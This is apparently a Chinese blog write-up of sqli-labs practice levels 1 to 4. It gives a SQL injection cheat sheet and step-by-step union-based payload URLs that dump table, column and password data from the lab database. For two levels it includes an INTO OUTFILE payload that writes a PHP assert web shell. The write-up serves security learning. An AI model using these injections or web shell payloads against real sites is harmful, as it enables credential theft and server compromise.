
<!DOCTYPE html><html lang="zh-CN">

<head>
  <meta charset="utf-8">
  <meta name="hexo-theme" content="https://github.com/xaoxuu/hexo-theme-stellar/tree/1.29.1" theme-name="Stellar" theme-version="1.29.1">
  
  <meta name="generator" content="Hexo 6.3.0">
  <meta http-equiv='x-dns-prefetch-control' content='on' />
  
  <meta name="renderer" content="webkit">
  <meta name="force-rendering" content="webkit">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  <meta name="HandheldFriendly" content="True" >
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#000">
  <meta name="theme-color" content="#f9fafb">
  
  <title>sqli-labs-1-8 - Dr4x3zz</title>

  
    <meta name="description" content="# sqli-labs-1-8">
<meta property="og:type" content="article">
<meta property="og:title" content="sqli-labs-1-8">
<meta property="og:url" content="https://dr4x3zz.github.io/2022/12/21/sqli-labs-1-8/index.html">
<meta property="og:site_name" content="Dr4x3zz">
<meta property="og:description" content="# sqli-labs-1-8">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-12-21T12:20:08.000Z">
<meta property="article:modified_time" content="2023-11-03T16:16:22.000Z">
<meta property="article:author" content="Dr4x3zz">
<meta property="article:tag" content="sqli-labs">
<meta name="twitter:card" content="summary">
  
  
  
  

  <!-- feed -->
  
    <link rel="alternate" href="/atom.xml" title="Dr4x3zz" type="application/atom+xml">
  

  <link rel="stylesheet" href="/css/main.css?v=1.29.1">


  

  

  
</head>
<body>

<div class="l_body s:aa content tech" id="start" layout="post" ><aside class="l_left"><div class="leftbar-container">


<header class="header"><div class="logo-wrap"><a class="avatar" href="/about/"><div class="bg" style="opacity:0;background-image:url(https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/avatar/round/rainbow64@3x.webp);"></div><img no-lazy class="avatar" src="https://raw.githubusercontent.com/Dr4x3zz/picgo/refs/heads/master/yeye.jpg" onerror="javascript:this.classList.add('error');this.src='https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/image/2659360.svg';"></a><a class="title" href="/"><div class="main" ff="title">Dr4x3zz</div></a></div></header>

<div class="nav-area">
<div class="search-wrapper" id="search-wrapper"><form class="search-form"><a class="search-button" onclick="document.getElementById(&quot;search-input&quot;).focus();"><svg t="1705074644177" viewBox="0 0 1025 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="1560" width="200" height="200"><path d="M1008.839137 935.96571L792.364903 719.491476a56.783488 56.783488 0 0 0-80.152866 0 358.53545 358.53545 0 1 1 100.857314-335.166073 362.840335 362.840335 0 0 1-3.689902 170.145468 51.248635 51.248635 0 1 0 99.217358 26.444296 462.057693 462.057693 0 1 0-158.255785 242.303546l185.930047 185.725053a51.248635 51.248635 0 0 0 72.568068 0 51.248635 51.248635 0 0 0 0-72.978056z" p-id="1561"></path><path d="M616.479587 615.969233a50.428657 50.428657 0 0 0-61.498362-5.534852 174.655348 174.655348 0 0 1-177.525271 3.484907 49.403684 49.403684 0 0 0-58.833433 6.76482l-3.074918 2.869923a49.403684 49.403684 0 0 0 8.609771 78.10292 277.767601 277.767601 0 0 0 286.992355-5.739847 49.403684 49.403684 0 0 0 8.404776-76.667958z" p-id="1562"></path></svg></a><input type="text" class="search-input" id="search-input" placeholder="站内搜索"></form><div id="search-result"></div><div class="search-no-result">没有找到内容！</div></div>


<nav class="menu dis-select"></nav>
</div>
<div class="widgets">


<widget class="widget-wrapper post-list"><div class="widget-header dis-select"><span class="name">最近更新</span></div><div class="widget-body fs14"><a class="item title" href="/2024/11/03/MeiYa2022-Individual/"><span class="title">MeiYa2022-Individual</span></a><a class="item title" href="/2024/06/06/Vulnstack%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA/"><span class="title">Vulnstack红日靶场</span></a><a class="item title" href="/2023/04/05/upload-labs/"><span class="title">upload-labs</span></a><a class="item title" href="/2023/03/31/sqli-labs-46-53/"><span class="title">sqli-labs-46-53</span></a><a class="item title" href="/2023/03/29/sqli-labs-41-45/"><span class="title">sqli-labs-41-45</span></a><a class="item title" href="/2023/03/26/sqli-labs-37-40/"><span class="title">sqli-labs-37-40</span></a><a class="item title" href="/2023/01/20/sqli-labs-33-36/"><span class="title">sqli-labs-33-36</span></a><a class="item title" href="/2023/01/17/sqli-labs-29-32/"><span class="title">sqli-labs-29-32</span></a><a class="item title" href="/2023/01/15/sqli-labs-27-28a/"><span class="title">sqli-labs-27-28a</span></a><a class="item title" href="/2023/01/10/sqli-labs-23-26a/"><span class="title">sqli-labs-23-26a</span></a></div></widget>
</div>

</div></aside><div class="l_main" id="main">





<div class="article banner top">
  <div class="content">
    <div class="top bread-nav footnote"><div class="left"><div class="flex-row" id="breadcrumb"><a class="cap breadcrumb" href="/">主页</a>
<span class="sep"></span><a class="cap breadcrumb" href="/">文章</a><span class="sep"></span><a class="cap breadcrumb-link" href="/categories/sqli-labs/">sqli-labs</a></div>
<div class="flex-row" id="post-meta"><span class="text created">发布于：<time datetime="2022-12-21T12:20:08.000Z">2022-12-21</time></span><span class="sep updated"></span><span class="text updated">更新于：<time datetime="2023-11-03T16:16:22.000Z">2023-11-04</time></span></div></div></div>
    
    <div class="bottom only-title">
      
      <div class="text-area">
        <h1 class="text title"><span>sqli-labs-1-8</span></h1>
        
      </div>
    </div>
    
  </div>
  </div><article class="md-text content"><h2 id="sqli-labs-1-8"><a class="markdownIt-Anchor" href="#sqli-labs-1-8">#</a> sqli-labs-1-8</h2>
<span id="more"></span>
<h3 id="sql注入"><a class="markdownIt-Anchor" href="#sql注入">#</a> SQL 注入</h3>
<h4 id="sql注入常用"><a class="markdownIt-Anchor" href="#sql注入常用">#</a> SQL 注入常用</h4>
<blockquote>
<p><strong>information_schema：表示所有信息，包括库、表、列</strong><br>
<strong> information_schema.tables：记录所有表名信息的表</strong><br>
<strong> information_schema.columns：记录所有列名信息的表</strong><br>
<strong> table_schema：数据库的名称</strong><br>
<strong> table_name: 表名</strong><br>
<strong> column_name: 列名</strong><br>
<strong> group_concat (): 显示所有查询到的数据</strong></p>
</blockquote>
<h4 id="哪里存在sql注入"><a class="markdownIt-Anchor" href="#哪里存在sql注入">#</a> 哪里存在 SQL 注入？</h4>
<p><strong>·</strong> <strong>GET</strong><br>
<strong>·</strong> <strong>POST</strong><br>
<strong>·</strong> <strong>HTTP 头部注入</strong><br>
<strong>・</strong> <strong>Cookie 注入</strong></p>
<h4 id="sql注入的类型"><a class="markdownIt-Anchor" href="#sql注入的类型">#</a> sql 注入的类型</h4>
<p>1、字符型注入<br>
 2、数字型注入</p>
<h4 id="mysql中3种注释风格"><a class="markdownIt-Anchor" href="#mysql中3种注释风格">#</a> MySQL 中 3 种注释风格</h4>
<blockquote>
<p>‘#’ （url 编码为 %23）<br>
‘–’ （–后边要跟上一个或多个空格 --+）</p>
</blockquote>
<h4 id="判断注入点"><a class="markdownIt-Anchor" href="#判断注入点">#</a> 判断注入点</h4>
<blockquote>
<p>and 1=1 /and 1=2 回显页面不同（整形判断）<br>
若在 GET 请求中？id=1 and 1=1 和？id=1 and 1=2 都没有报错，则是字符型注入。<br>
若在 GET 请求中？id=1 and 1=1 没有报错，但是？id=1 and 1=2 有异常或没回显，则是数字型注入。<br>
单引号判断 ’ 显示数据库错误信息或者页面回显不同（整形，字符串类型判断）</p>
</blockquote>
<h4 id="步骤"><a class="markdownIt-Anchor" href="#步骤">#</a> 步骤</h4>
<h5 id="1-判断列数"><a class="markdownIt-Anchor" href="#1-判断列数">#</a> 1、判断列数</h5>
<blockquote>
<p>order by 1<br>
order by 2<br>
…<br>
order by 70</p>
</blockquote>
<h5 id="2-判断显示位"><a class="markdownIt-Anchor" href="#2-判断显示位">#</a> 2、判断显示位</h5>
<blockquote>
<p>url?id=-1 union select 1,2,3,4,5</p>
</blockquote>
<h5 id="3-获取当数据库名称和当前连接数据库的用户"><a class="markdownIt-Anchor" href="#3-获取当数据库名称和当前连接数据库的用户">#</a> 3、获取当数据库名称和当前连接数据库的用户</h5>
<blockquote>
<p>url?id=-1 union select 1,2,databaes(),4,5<br>
url?id=-1 union select 1,2,user(),4,5</p>
</blockquote>
<h5 id="4-列出所有数据库"><a class="markdownIt-Anchor" href="#4-列出所有数据库">#</a> 4、列出所有数据库</h5>
<blockquote>
<p><strong>limit 一个一个打印出来库名</strong><br>
 select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1<br>
<strong>group_concat 一次性全部显示</strong><br>
 select group_concat (SCHEMA_NAME) from information_schema.SCHEMATA</p>
</blockquote>
<h5 id="5-列出数据库test中所有的表"><a class="markdownIt-Anchor" href="#5-列出数据库test中所有的表">#</a> 5、列出 (数据库：test) 中所有的表</h5>
<blockquote>
<p><strong>limit 一个一个打印出来字段名</strong><br>
 select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=‘test’<br>
limit 0,1<br>
<strong>group_concat 一次性全部显示</strong><br>
 select group_concat (TABLE_NAME) from information_schema.TABLES where<br>
TABLE_SCHEMA=0x674657374<br>
 注意：数据库名称可以用十六进制来代替字符串，这样可以绕过单引号的限制。</p>
</blockquote>
<h5 id="6-列出数据库test-表admin-中所有的字段"><a class="markdownIt-Anchor" href="#6-列出数据库test-表admin-中所有的字段">#</a> 6、列出（数据库：test 表：admin ）中所有的字段</h5>
<blockquote>
<p><strong>limit 一个一个打印出来</strong><br>
 select COLUMN_NAME from information_schema.COLUMNS where<br>
TABLE_SCHEMA=‘baji’ and TABLE_NAME=‘users’ limit 0,1<br>
<strong>group_concat 一次性全部显示</strong><br>
 select group_concat (COLUMN_NAME) from information_schema.COLUMNS where<br>
TABLE_SCHEMA=0x74657374 and TABLE_NAME=0x61646d696e</p>
</blockquote>
<h5 id="7-列出数据库test-表admin-中的数据"><a class="markdownIt-Anchor" href="#7-列出数据库test-表admin-中的数据">#</a> 7、列出（数据库：test 表：admin ）中的数据</h5>
<blockquote>
<p><strong>limit 一个一个打印出来</strong><br>
 select username,passwd from test.admin limit 0,1<br>
<strong>group_concat 把 一次性全部打印</strong><br>
 select group_concat (concat (username,0x20,passwd)) from test.admin<br>
network</p>
</blockquote>
<p>本文参考参考链接：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_37133717/article/details/93498444">https://blog.csdn.net/qq_37133717/article/details/93498444</a></p>
<h3 id="sqli-labs-1"><a class="markdownIt-Anchor" href="#sqli-labs-1">#</a> sqli-labs-1</h3>
<p>通过题目的名字 &quot;GET-Error based - Single quotes - String (基于 GET 错误 - 单引号 - 字符串)&quot; 可知，题目是一个单引号引起的字符型</p>
<p>在 url 后面输入？id=1 and 1=1,url?id=1 1=2 后发现页面正常没有不同，考虑为字符型<br>
添加单引号后，页面出现</p>
<blockquote>
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘1’’ LIMIT 0,1’ at line 1</p>
</blockquote>
<p>可以看到存在’' 包装<br>
继续在后面添加–+</p>
<blockquote>
<p>url?id=1’ --+<br>
 发现页面异常，存在单引号的注入问题</p>
</blockquote>
<h4 id="用order-by猜解列数"><a class="markdownIt-Anchor" href="#用order-by猜解列数">#</a> 用 order by 猜解列数</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27; and 1=2 order 1 --+</span><br></pre></td></tr></table></figure>
<p>依次使用</p>
<blockquote>
<p>order 2<br>
order 3<br>
order 4<br>
<strong> 页面显示 Unknown column ‘4’ in 'order clause’</strong><br>
说明一共有三个字段</p>
</blockquote>
<h4 id="显示回显位"><a class="markdownIt-Anchor" href="#显示回显位">#</a> 显示回显位</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27; and 1=2 union select 1,2,3 --+</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>Your Login name:2<br>
Your Password:3<br>
 得出可显字段为 2 和 3<br>
 所以我们查找数据库</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27; and 1=2 union select 1,database(),3 --+</span><br></pre></td></tr></table></figure>
<p>或者</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27; and 1=2 union select 1,2,database() --+</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>Your Login name:security<br>
Your Password:3<br>
 得出数据库名称为：security</p>
</blockquote>
<h4 id="爆数据"><a class="markdownIt-Anchor" href="#爆数据">#</a> 爆数据</h4>
<h5 id="查询表名"><a class="markdownIt-Anchor" href="#查询表名">#</a> 查询表名</h5>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27; and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=&#x27;security&#x27; --+</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>Your Login name:emails,referers,uagents,users<br>
Your Password:3<br>
 得出表名为 emails,referers,uagents,users</p>
</blockquote>
<h5 id="查询列明"><a class="markdownIt-Anchor" href="#查询列明">#</a> 查询列明</h5>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27; and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=&#x27;security&#x27; --+</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>Your Login name:id,email_id,id,referer,ip_address,id,uagent,ip_address,username,id,username,password<br>
Your Password:3<br>
 得出列名为 id,email_id,id,referer,ip_address,id,uagent,ip_address,username,id,username,password</p>
</blockquote>
<h5 id="查询数据"><a class="markdownIt-Anchor" href="#查询数据">#</a> 查询数据</h5>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27; and 1=2 union select 1,username,password from users limit 0,1 --+</span><br></pre></td></tr></table></figure>
<p><em>这里采用 limit 0,1，因为用 group_concat（）一次爆出多条数据，不方便我们查看相对应的用户名和密码</em></p>
<p>依次增加 0,1   1,1   2,1   3,1 直至页面无数据显示<br>
将分别得到的内容整合成一个表，如下：</p>
<table>
<thead>
<tr>
<th>username</th>
<th>password</th>
</tr>
</thead>
<tbody>
<tr>
<td>Dumb</td>
<td>Dumb</td>
</tr>
<tr>
<td>Angelina</td>
<td>I-kill-you</td>
</tr>
<tr>
<td>Dummy</td>
<td>p@ssword</td>
</tr>
<tr>
<td>secure</td>
<td>crappy</td>
</tr>
<tr>
<td>stupid</td>
<td>stupidity</td>
</tr>
<tr>
<td>superman</td>
<td>genious</td>
</tr>
<tr>
<td>batman</td>
<td>mob!le</td>
</tr>
<tr>
<td>admin</td>
<td>admin</td>
</tr>
</tbody>
</table>
<p>若想直接爆出所有用户名和密码可以这样写</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&#x27; union select 1,group_concat(username),group_concat(password) from users --+</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin<br>
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin<br>
 按顺序对应各自的 username 和 password</p>
</blockquote>
<h2 id="sqli-labs-2"><a class="markdownIt-Anchor" href="#sqli-labs-2">#</a> sqli-labs-2</h2>
<h4 id="初步判断"><a class="markdownIt-Anchor" href="#初步判断">#</a> 初步判断</h4>
<p>输入？id=1 得出页面回显</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>Your Login name:Dumb<br>
Your Password:Dumb</p>
</blockquote>
<p>接着在 url 后添加’</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27;</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’ LIMIT 0,1’ at line 1</p>
</blockquote>
<p>说明 SQL 语法错误 <strong>‘’ LIMIT 0,1’ at line 1</strong> 显示添加后语法中多了一个’，说明本题不需要闭合<br>
用 1=1，1=2 判断为字符还是数字</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">url?id=1 and 1=1</span><br><span class="line">url?id=1 and 1=2</span><br></pre></td></tr></table></figure>
<p>发现 1=2 异常说明本题为数字型注入</p>
<h4 id="查询列数"><a class="markdownIt-Anchor" href="#查询列数">#</a> 查询列数</h4>
<p>使用 order</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">url?id=1 and 1=2 order by 1 --+</span><br><span class="line">order by 2</span><br><span class="line">...</span><br><span class="line">url?id=1 and 1=2 order by 4 --+</span><br></pre></td></tr></table></figure>
<p>这时候页面异常显示</p>
<blockquote>
<p>Unknown column ‘4’ in ‘order clause’<br>
说明只有三列</p>
</blockquote>
<h4 id="确定哪个字段有回显"><a class="markdownIt-Anchor" href="#确定哪个字段有回显">#</a> 确定哪个字段有回显</h4>
<p>使用 union select 联合注入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1 and 1=2 union select 1,2,3 --+</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>Your Login name:2<br>
Your Password:3</p>
</blockquote>
<p>得出二三列回显</p>
<h4 id="确定当前数据库名称"><a class="markdownIt-Anchor" href="#确定当前数据库名称">#</a> 确定当前数据库名称</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1 and 1=2 union select 1,database(),3 --+</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>Your Login name:security<br>
Your Password:3</p>
</blockquote>
<p>得出数据库名称为 security</p>
<h4 id="得出数据库所有表名"><a class="markdownIt-Anchor" href="#得出数据库所有表名">#</a> 得出数据库所有表名</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=&#x27;security&#x27; --+</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>Your Login name:emails,referers,uagents,users<br>
Your Password:3</p>
</blockquote>
<p>得出数据库的所有表名为<strong> emails,referers,uagents,users</strong></p>
<h4 id="得出数据库所有列名"><a class="markdownIt-Anchor" href="#得出数据库所有列名">#</a> 得出数据库所有列名</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=&#x27;security&#x27; --+</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>Your Login name:email_id,id,id,ip_address,referer,id,ip_address,uagent,username,id,password,username<br>
Your Password:3</p>
</blockquote>
<p>得出所有列名为<br>
<strong> email_id,id,id,ip_address,referer,id,ip_address,uagent,username,id,password,username</strong><br>
 如果只想获得 uesr 表中的列名，方便我们查找的话，可以继续添加一些内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=&#x27;security&#x27;  and table_name = &#x27;users&#x27; --+</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>Your Login name:id,password,username<br>
Your Password:3</p>
</blockquote>
<p>得出 users 表中的列名为<strong> id,password,username</strong></p>
<h4 id="得出users表中的所有username和password"><a class="markdownIt-Anchor" href="#得出users表中的所有username和password">#</a> 得出 users 表中的所有 username 和 password</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1 and 1=2 union select 1,group_concat(username),group_concat(password) from users --+</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin<br>
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin</p>
</blockquote>
<p>按顺序对应 username 和 password<br>
 如果想更好的查看对应的 username 和 password<br>
 可以添加 limit 0,1 将 group_concat () 删去</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">url?id=1 and 1=2 union select 1,username,password from users limit 0,1 --+</span><br><span class="line">limit 1,1</span><br><span class="line">limit 2,1</span><br><span class="line">...</span><br></pre></td></tr></table></figure>
<p>通过这样的方法就能得到所有的 username 和 password</p>
<h4 id="写入webshell"><a class="markdownIt-Anchor" href="#写入webshell">#</a> 写入 webshell</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1 and 1=2 union select 1,2,&#x27;&lt;?php assert($_POST[Less2]);?&gt;&#x27; into outfile &#x27;C:/less2.php&#x27; --+</span><br></pre></td></tr></table></figure>
<p>这样能在 c 盘中找到 less2.php 文件<br>
内容就为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php assert($_POST[Less2]);?&gt;</span><br></pre></td></tr></table></figure>
<h2 id="sqli-labs-3"><a class="markdownIt-Anchor" href="#sqli-labs-3">#</a> sqli-labs-3</h2>
<h4 id="初步判断-2"><a class="markdownIt-Anchor" href="#初步判断-2">#</a> 初步判断</h4>
<h5 id="判断一下是否回显"><a class="markdownIt-Anchor" href="#判断一下是否回显">#</a> 判断一下是否回显</h5>
<p>输入正确的 url</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>Your Login name:Dumb<br>
Your Password:Dumb</p>
</blockquote>
<p>说明会回显</p>
<h5 id="判断需要闭合什么符号"><a class="markdownIt-Anchor" href="#判断需要闭合什么符号">#</a> 判断需要闭合什么符号</h5>
<p>在 url 后面添加’</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27;</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘1’’) LIMIT 0,1’ at line 1</p>
</blockquote>
<p>说明我们需要闭合一个)</p>
<h5 id="判断是什么型注入"><a class="markdownIt-Anchor" href="#判断是什么型注入">#</a> 判断是什么型注入</h5>
<p>运用 and 1=1 和 1=2</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27;) and 1=2 --+</span><br></pre></td></tr></table></figure>
<p>此时页面异常，说明是数字型注入</p>
<h4 id="获取列数"><a class="markdownIt-Anchor" href="#获取列数">#</a> 获取列数</h4>
<p>用 order by 1，order by 2 … 直至 order by 4<br>
 此时报错<br>
页面显示</p>
<blockquote>
<p>Unknown column ‘4’ in ‘order clause’</p>
</blockquote>
<p>从而可得知列数有三列</p>
<h4 id="获取数据库名称"><a class="markdownIt-Anchor" href="#获取数据库名称">#</a> 获取数据库名称</h4>
<p>用联合注入 union select 判断哪些字段会回显</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27;) and 1=2 union select 1,2,3 --+</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>Your Login name:2<br>
Your Password:3</p>
</blockquote>
<p>得到 2，3 字段会回显后直接用 database () 获取数据库</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27;) and 1=2 union select 1,database(),3 --+</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>Your Login name:security<br>
Your Password:3</p>
</blockquote>
<p>得到数据库名称为 security</p>
<h4 id="获取所有表名"><a class="markdownIt-Anchor" href="#获取所有表名">#</a> 获取所有表名</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27;) and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = &#x27;security&#x27; --+</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>Your Login name:emails,referers,uagents,users<br>
Your Password:3</p>
</blockquote>
<p>得到数据库的所有表名为<strong> emails,referers,uagents,users</strong></p>
<h4 id="获取数据库中users表的所有列名"><a class="markdownIt-Anchor" href="#获取数据库中users表的所有列名">#</a> 获取数据库中 users 表的所有列名</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27;) and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = &#x27;security&#x27; --+</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>Your Login name:email_id,id,id,ip_address,referer,id,ip_address,uagent,username,id,password,username<br>
Your Password:3</p>
</blockquote>
<p>得到 users 表中的所有列名</p>
<h4 id="爆出users表中的所有username和password"><a class="markdownIt-Anchor" href="#爆出users表中的所有username和password">#</a> 爆出 users 表中的所有 username 和 password</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27;) and 1=2 union select 1,group_concat(username),group_concat(password) from users --+</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin<br>
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin</p>
</blockquote>
<p>依次对应各个 username 和 password</p>
<h4 id="写入webshelll"><a class="markdownIt-Anchor" href="#写入webshelll">#</a> 写入 webshelll</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27;) and 1=2 union select 1,2,&#x27;&lt;?php assert($_POST[Less3]);?&gt;&#x27; into outfile &#x27;C:/Less3.php&#x27; --+</span><br></pre></td></tr></table></figure>
<p>可以在路径中找到 Less3.php，里面的内容为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php assert($_POST[Less3]);?&gt;</span><br></pre></td></tr></table></figure>
<h2 id="sqli-labs-4"><a class="markdownIt-Anchor" href="#sqli-labs-4">#</a> sqli-labs-4</h2>
<h4 id="前言"><a class="markdownIt-Anchor" href="#前言">#</a> 前言</h4>
<p>如果字段本身是 int 类型，并且在查询语句中该字段的值被双引号或者单引号包裹，则只要值是以正确数字开头的，后面接多余的字符还是可以返回正确的查询结果，甚至单引号中可以包含双引号，双引号中可以包含单引号。<br>
如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE id = &quot;1&#x27;m&quot;</span><br></pre></td></tr></table></figure>
<p>学习连接：<a target="_blank" rel="noopener" href="https://blog.csdn.net/elephantxiang/article/details/119684515">https://blog.csdn.net/elephantxiang/article/details/119684515</a></p>
<h4 id="初步判断-3"><a class="markdownIt-Anchor" href="#初步判断-3">#</a> 初步判断</h4>
<p>输入正确的 id</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>Your Login name:Dumb<br>
Your Password:Dumb</p>
</blockquote>
<p>说明会回显<br>
输入’<br>
发现页面没有报错<br>
接着输入 &quot;</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&quot;</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘“1&quot;”) LIMIT 0,1’ at line 1</p>
</blockquote>
<p>由此可知，本题的闭合为 &quot;)</p>
<p>有 and 1=1 和 and1=2 判断是字符型注入还是数字型注入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&quot;) and 1=2 --+</span><br></pre></td></tr></table></figure>
<p>此时页面显示异常，说明是数字型注入</p>
<h4 id="判断列数"><a class="markdownIt-Anchor" href="#判断列数">#</a> 判断列数</h4>
<p>order by 1/2/3/4<br>
